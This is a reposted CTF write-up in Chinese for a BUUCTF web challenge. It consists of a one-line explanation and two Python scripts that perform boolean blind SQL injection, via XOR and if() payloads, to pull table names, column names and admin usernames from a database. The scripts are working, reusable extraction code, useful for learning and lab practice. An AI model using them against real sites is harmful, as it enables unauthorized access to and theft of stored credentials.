首页 > Web开发 > 详细

[Black Watch 入群题]Web

时间:2020-06-07 00:25:21      阅读:158      评论:0      收藏:0      [点我收藏+]

[Black Watch 入群题]Web

布尔盲注,爆出用户密码登录得flag

抑或

import requests
url = "http://28efd88e-90e7-48b0-aa07-9ed14c473b27.node3.buuoj.cn/backend/content_detail.php?id=2^"

name = ""
i=0
while True :
	head = 32
	tail = 127
	i += 1
	while(head<tail):
		mid = head + tail >> 1
		payload = "(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))>%d)" %(i,mid)
		payload = "(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name=‘contents‘)),%d,1))>%d)" %(i,mid)
		payload = "(ascii(substr((select(group_concat(username))from(admin)),%d,1))>%d)" %(i,mid)
		
		r = requests.get(url+payload)
		#print(url+payload)
		#print(r.json())
		if "Yunen" in str(r.json()):
			head = mid + 1
		else:
			tail = mid
	if head!=32 :
		name += chr(head)
		print(name)
	else:
		break
	
		

if

import requests
url = "http://28efd88e-90e7-48b0-aa07-9ed14c473b27.node3.buuoj.cn/backend/content_detail.php?id="

name = ""
i=0
while True :
	head = 32
	tail = 127
	i += 1
	while(head<tail):
		mid = head + tail >> 1
		payload = "if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))>%d,3,2)" %(i,mid)
		payload = "if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name=‘contents‘)),%d,1))>%d,3,2)" %(i,mid)
		payload = "if(ascii(substr((select(group_concat(username))from(admin)),%d,1))>%d,3,2)" %(i,mid)
		
		r = requests.get(url+payload)
		#print(url+payload)
		#print(r.json())
		if "Yunen" in str(r.json()):
			head = mid + 1
		else:
			tail = mid
	if head!=32 :
		name += chr(head)
		print(name)
	else:
		break	

技术分享图片

[Black Watch 入群题]Web

原文:https://www.cnblogs.com/h3zh1/p/13057730.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!